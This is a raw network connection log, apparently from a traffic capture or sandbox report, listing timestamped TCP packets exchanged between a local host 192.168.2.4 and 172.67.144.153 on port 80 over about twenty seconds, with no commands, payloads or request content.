Apr 29, 2024 01:03:26.702743053 CEST	49791	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.702836037 CEST	49792	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.703515053 CEST	49793	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.813514948 CEST	80	49791	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.813597918 CEST	49791	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.814210892 CEST	80	49793	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.814233065 CEST	80	49792	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.814281940 CEST	49793	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.814310074 CEST	49792	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.814485073 CEST	49793	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.927723885 CEST	80	49793	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.927752972 CEST	80	49793	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.928025007 CEST	49793	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:27.078725100 CEST	80	49793	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:27.313679934 CEST	80	49793	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:27.313710928 CEST	80	49793	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:27.313801050 CEST	49793	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:27.485661983 CEST	49793	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:27.486327887 CEST	49794	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:27.596787930 CEST	80	49794	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:27.596894979 CEST	49794	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:27.597063065 CEST	49794	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:27.597100019 CEST	80	49793	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:27.597152948 CEST	49793	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:27.707436085 CEST	80	49794	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:27.707488060 CEST	80	49794	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:27.726479053 CEST	49794	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:27.878343105 CEST	80	49794	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:28.128911018 CEST	80	49794	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:28.128958941 CEST	80	49794	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:28.129020929 CEST	49794	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:29.099811077 CEST	49794	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:29.155365944 CEST	49795	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:29.211239100 CEST	80	49794	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:29.211338043 CEST	49794	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:29.265352011 CEST	80	49795	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:29.265459061 CEST	49795	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:29.265672922 CEST	49795	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:29.375575066 CEST	80	49795	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:29.375639915 CEST	80	49795	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:29.375814915 CEST	49795	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:29.527575016 CEST	80	49795	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:29.778788090 CEST	80	49795	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:29.778841972 CEST	80	49795	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:29.778911114 CEST	49795	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:29.941694021 CEST	49795	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:29.942531109 CEST	49796	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.052534103 CEST	80	49795	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.052613020 CEST	49795	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.052839041 CEST	80	49796	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.052918911 CEST	49796	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.053055048 CEST	49796	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.163387060 CEST	80	49796	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.163781881 CEST	80	49796	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.163950920 CEST	49796	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.315072060 CEST	80	49796	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.552684069 CEST	80	49796	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.552728891 CEST	80	49796	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.552784920 CEST	80	49796	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.552814960 CEST	49796	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.675580978 CEST	49796	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.676419973 CEST	49797	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.786830902 CEST	80	49796	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.786875010 CEST	80	49797	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.786922932 CEST	49796	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.787030935 CEST	49797	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.787390947 CEST	49797	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:30.897695065 CEST	80	49797	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.897986889 CEST	80	49797	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:30.898279905 CEST	49797	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.049118042 CEST	80	49797	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.279705048 CEST	80	49797	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.279766083 CEST	80	49797	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.279921055 CEST	49797	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.331382036 CEST	49797	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.332313061 CEST	49798	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.410687923 CEST	49799	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.442413092 CEST	80	49797	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.442743063 CEST	80	49798	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.442926884 CEST	49797	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.442976952 CEST	49798	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.443100929 CEST	49798	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.520682096 CEST	80	49799	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.520926952 CEST	49799	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.521130085 CEST	49799	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.554368019 CEST	80	49798	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.554579020 CEST	80	49798	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.554858923 CEST	49798	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.630790949 CEST	80	49799	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.630997896 CEST	80	49799	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.631186962 CEST	49799	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:31.665352106 CEST	80	49798	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.782435894 CEST	80	49799	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.977374077 CEST	80	49798	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.977436066 CEST	80	49798	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:31.977531910 CEST	49798	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:32.054788113 CEST	80	49799	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:32.054840088 CEST	80	49799	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:32.054960966 CEST	49799	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:33.597919941 CEST	49798	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:33.598025084 CEST	49799	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:33.598834991 CEST	49800	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:33.708427906 CEST	80	49799	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:33.708539009 CEST	49799	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:33.708595037 CEST	80	49800	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:33.708673954 CEST	49800	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:33.709005117 CEST	80	49798	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:33.709072113 CEST	49798	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:33.727009058 CEST	49800	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:33.838843107 CEST	80	49800	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:33.839577913 CEST	80	49800	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:33.839802980 CEST	49800	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:33.990617037 CEST	80	49800	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:34.233561039 CEST	80	49800	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:34.233604908 CEST	80	49800	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:34.233658075 CEST	49800	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:35.432636976 CEST	49800	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:35.433299065 CEST	49801	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:35.543225050 CEST	80	49800	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:35.543289900 CEST	80	49801	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:35.543324947 CEST	49800	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:35.543389082 CEST	49801	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:35.543540001 CEST	49801	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:35.653424025 CEST	80	49801	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:35.653649092 CEST	80	49801	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:35.737169027 CEST	49801	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:36.211579084 CEST	49801	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:36.372855902 CEST	80	49801	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:36.628314972 CEST	80	49801	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:36.628359079 CEST	80	49801	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:36.628464937 CEST	49801	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:36.827086926 CEST	49801	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:36.870588064 CEST	49802	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:36.937464952 CEST	80	49801	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:36.937585115 CEST	49801	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:36.980535984 CEST	80	49802	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:36.980618000 CEST	49802	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:36.981051922 CEST	49802	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:36.988634109 CEST	49803	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.091108084 CEST	80	49802	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.091358900 CEST	80	49802	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.091571093 CEST	49802	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.099109888 CEST	80	49803	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.099210978 CEST	49803	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.099370956 CEST	49803	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.211966038 CEST	80	49803	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.212356091 CEST	80	49803	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.212548971 CEST	49803	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.242481947 CEST	80	49802	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.323342085 CEST	80	49803	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.483685017 CEST	80	49802	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.483707905 CEST	80	49802	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.483722925 CEST	80	49802	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.483772993 CEST	49802	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.616260052 CEST	49802	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.617000103 CEST	49804	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.653624058 CEST	80	49803	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.653656006 CEST	80	49803	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.653754950 CEST	49803	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.726494074 CEST	80	49802	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.726645947 CEST	49802	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.727283001 CEST	80	49804	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.727377892 CEST	49804	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.730226994 CEST	49804	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.840564966 CEST	80	49804	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.840893030 CEST	80	49804	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:37.841108084 CEST	49804	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:37.991942883 CEST	80	49804	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.263811111 CEST	80	49804	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.263843060 CEST	80	49804	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.263951063 CEST	49804	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:38.393376112 CEST	49803	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:38.417156935 CEST	49804	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:38.417943954 CEST	49805	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:38.505388021 CEST	80	49803	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.505531073 CEST	49803	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:38.527821064 CEST	80	49804	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.527867079 CEST	80	49805	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.527895927 CEST	49804	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:38.527980089 CEST	49805	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:38.528333902 CEST	49805	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:38.638075113 CEST	80	49805	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.638392925 CEST	80	49805	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.638571024 CEST	49805	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:38.789093018 CEST	80	49805	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.927175045 CEST	80	49805	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.927237988 CEST	80	49805	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:38.927320004 CEST	49805	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.049365997 CEST	49805	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.050954103 CEST	49806	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.159894943 CEST	80	49805	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:39.159987926 CEST	49805	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.160604954 CEST	80	49806	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:39.160685062 CEST	49806	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.160852909 CEST	49806	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.271142006 CEST	80	49806	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:39.271306992 CEST	80	49806	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:39.271482944 CEST	49806	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.422908068 CEST	80	49806	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:39.654831886 CEST	80	49806	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:39.654889107 CEST	80	49806	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:39.654922009 CEST	80	49806	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:39.655008078 CEST	49806	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.782696009 CEST	49806	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.783639908 CEST	49807	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.893759966 CEST	80	49806	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:39.893847942 CEST	49806	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.894013882 CEST	80	49807	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:39.894098043 CEST	49807	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:39.894431114 CEST	49807	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:40.004893064 CEST	80	49807	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:40.005453110 CEST	80	49807	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:40.005656958 CEST	49807	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:40.156868935 CEST	80	49807	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:40.398134947 CEST	80	49807	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:40.398168087 CEST	80	49807	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:40.398183107 CEST	80	49807	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:40.398255110 CEST	49807	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:40.515908957 CEST	49807	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:40.516733885 CEST	49808	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:40.626673937 CEST	80	49808	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:40.626708031 CEST	80	49807	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:40.626796961 CEST	49808	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:40.626836061 CEST	49807	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:40.627022982 CEST	49808	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:40.736816883 CEST	80	49808	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:40.737124920 CEST	80	49808	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:40.737370014 CEST	49808	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:40.888489008 CEST	80	49808	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:41.161256075 CEST	80	49808	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:41.161339045 CEST	80	49808	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:41.161427021 CEST	49808	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:41.288283110 CEST	49808	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:41.288899899 CEST	49809	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:41.398719072 CEST	80	49809	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:41.398847103 CEST	49809	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:41.398999929 CEST	80	49808	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:41.399061918 CEST	49808	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:41.399146080 CEST	49809	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:41.509217024 CEST	80	49809	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:41.509516954 CEST	80	49809	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:41.509711027 CEST	49809	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:41.661300898 CEST	80	49809	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:41.934927940 CEST	80	49809	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:41.934956074 CEST	80	49809	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:41.935024977 CEST	49809	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.061552048 CEST	49809	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.063091040 CEST	49810	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.172677040 CEST	80	49809	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.172745943 CEST	80	49810	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.172774076 CEST	49809	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.172832966 CEST	49810	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.173024893 CEST	49810	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.282744884 CEST	80	49810	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.282902002 CEST	80	49810	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.283159971 CEST	49810	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.433964014 CEST	80	49810	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.660455942 CEST	49811	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.675237894 CEST	80	49810	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.675283909 CEST	80	49810	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.675364971 CEST	49810	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.770350933 CEST	80	49811	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.770438910 CEST	49811	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.770606041 CEST	49811	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.796497107 CEST	49810	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.797065020 CEST	49812	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.880332947 CEST	80	49811	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.880490065 CEST	80	49811	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.885026932 CEST	49811	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.906313896 CEST	80	49810	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.906474113 CEST	49810	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.906712055 CEST	80	49812	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:42.906841040 CEST	49812	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.906974077 CEST	49812	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:42.994982958 CEST	80	49811	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.016707897 CEST	80	49812	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.017405033 CEST	80	49812	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.017607927 CEST	49812	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.168149948 CEST	80	49812	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.279943943 CEST	80	49811	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.279992104 CEST	80	49811	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.280066013 CEST	49811	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.406375885 CEST	80	49812	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.406466007 CEST	80	49812	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.406521082 CEST	49812	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.533225060 CEST	49811	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.533294916 CEST	49812	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.533999920 CEST	49813	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.643440962 CEST	80	49812	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.643814087 CEST	80	49811	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.643908978 CEST	49812	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.643918991 CEST	49811	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.644320965 CEST	80	49813	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.648015976 CEST	49813	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.648212910 CEST	49813	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.758476019 CEST	80	49813	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.758846998 CEST	80	49813	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:43.759149075 CEST	49813	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:43.910466909 CEST	80	49813	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:44.154586077 CEST	80	49813	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:44.154640913 CEST	80	49813	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:44.154716015 CEST	49813	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:44.289103031 CEST	49813	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:44.290007114 CEST	49814	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:44.400412083 CEST	80	49814	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:44.400532007 CEST	49814	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:44.400665998 CEST	80	49813	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:44.400692940 CEST	49814	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:44.400718927 CEST	49813	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:44.510994911 CEST	80	49814	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:44.511266947 CEST	80	49814	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:44.511449099 CEST	49814	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:44.662703991 CEST	80	49814	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:44.924441099 CEST	80	49814	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:44.924521923 CEST	80	49814	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:44.924752951 CEST	49814	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.053584099 CEST	49814	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.054598093 CEST	49815	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.164514065 CEST	80	49815	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:45.164602041 CEST	49815	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.164772987 CEST	49815	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.165656090 CEST	80	49814	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:45.167980909 CEST	49814	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.274456978 CEST	80	49815	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:45.274931908 CEST	80	49815	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:45.275156021 CEST	49815	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.425960064 CEST	80	49815	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:45.666493893 CEST	80	49815	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:45.666522980 CEST	80	49815	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:45.666809082 CEST	49815	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.789088964 CEST	49815	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.789664030 CEST	49816	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.899847031 CEST	80	49815	172.67.144.153	192.168.2.4
